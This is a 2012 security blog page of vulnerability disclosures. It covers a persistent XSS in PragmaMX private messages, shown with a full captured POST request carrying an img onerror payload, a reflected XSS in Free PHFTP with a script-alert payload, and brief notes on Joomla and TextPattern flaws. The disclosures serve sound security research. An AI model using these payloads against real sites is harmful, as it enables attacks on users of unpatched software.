Tuesday, 31 January 2012

Persistent XSS in PragmaMX 1.2.10


# TITLE ... # Persistent XSS in PragmaMX 1.12.0 for logged in users    #
# DATE .... # 30.01.2012 .......................................... #
# AUTOHR .. # http://hauntit.blogspot.com ................ #
# SOFT LINK # http://www.pragmamx.org ............................. #
# VERSION . # 1.12.0 .............................................. #
# TESTED ON # LAMP ................................................ #
#...................................................................#

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
 "pragmaMx - the fast CMS". :)
You should try it!

# 2. What is the type of vulnerability?
 This is persistent cross-site scripting for authenticated users.

Vulnerability exists in "Private Messages".
Here I present You sample HTTP traffic (from BurpProxy).

...cut...
POST /pragmaMx_1.12.0/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Ubuntu; X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://pragmaMx_1.12.0/html/modules.php?name=Private_Messages&op=send
Cookie: mxA9649D14D6AAF90E4A70576BF4ACC1=6db52d6de453f7a5890b36ebafd99fda; tab_ya_edituser=0; PHPSESSID=d7nhrjbs5i2pmjvo6vuj1hg2j1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

name=Private_Messages&op=submit&to_user=adminek&subject=persistent+MSG&image=icon1.gif&message=hi%21%0D%0A%27%3E%3Cimg+src%3Dy+onerror%3Dalert%28%27i+am+watching+you%27%29%3B%3E&msg_id=0&submit=Submit
...cut...

It depends on what code You will add to $message.
Persistent XSS code could be added when You decide to reply, too.

So click 'Reply' button, and as a $message parameter add Your XSS-code.

# 3. Where is bug :)

$message parameter in source code. We need (more) validation here. :)

# 4. More...

- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
- http://www.exploit-db.com/exploits/18439

# Best regards
#

Reflected XSS in Free PHFTP 4.2

# TITLE ..... # Reflected XSS in Free PHFTP 4.2 ..........#
# DATE ...... # 30.01.2012 ............................. #
# AUTOHR .... # HauntIT Blog ............................. #
# SOFT LINK . # http://www.mindcatch.com/ ......... #
# VERSION ... # 4.2 ............................. #
# TESTED ON . # LAMP ............................. #
#............................................#

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
 This is FTP client written in PHP. Very nice :)
You should try it.

# 2. What is the type of vulnerability?
 Its reflected XSS located in "Host" form of default PHFTP start-page.
Set up "Host" to:
'><script>alert(123)</script>
to see vulnerability.

# 3. Where is bug :)
ftp.php

# 4. More...

- http://www.mindcatch.com
- http://hauntit.blogspot.com
- http://www.google.com

# Best regards
#

Thank You Joomla Security Team

Hi,


I should write here a little more, but maybe soon...

Now I can tell You about Joomla Security Team: they are fast and full-of-knowledge! ;)

Watch them, soon there will be new release.

Best regards!

Monday, 23 January 2012

Little update here

3...2...1.. ;)

STOP ACTA!

No comments.

"rly."

Thursday, 19 January 2012

"Directional attacks" - You don't want it

Last days friend of a friend asked me about how his company could be "hacked like in the movies".
After few minutes of laugh and some wierd ideas, we get all "plans of possible work" with this project.

After few moments I saw that company's page is extremly secure so there won't be any possibility of sql injection attack... So I decide to "get-in" in a different way...
...and that's where the story about "How 'Directional Attacks' can threaten Your company" starts... :D

More I can say about this project is: I'm very glad to work with You, see You soon! ;)
*"No info given" about companys name, c'mon ;)"

To all e-mail's I'll answer to 22-23.01, sorry :)

Saturday, 7 January 2012

SQL Injection in TextPattern 4.4.1





Link to TextPattern here!

(more -> soon)

Wednesday, 4 January 2012

[UPDATE] Joomla 1.7 Vulnerable to XSS

Lets start Happy New Year by some reflection...

Reflection as "reflected XSS" in latest Joomla (1.7.3 for this post).


Scenario of this attack is quite simple: attacker must build file with XSS and send it to Victim.
For reflected XSS when we are talking about Admin and Users, situation could be like this:
- (mail to admin) hi admin, this is my file.html, could it be added to my Joomla Profile? (... or what ever else...;)  )
- wait, I must check it...
(...) and here is when admin or other user could be exploited by this reflected XSS.

What do You think: Should it be public? :D

UPDATE: (10.01.2012): 

As there is a nice example of how reflected XSS could be devastating, I present You
link to PoC I found here (it is well known polish portal about security and IT, enjoy!).

Pastebin link is example of what Aditya Modha and Samir Shah found in WordPress 3.3.
Nice work! ;)

(more -> soon... ;) )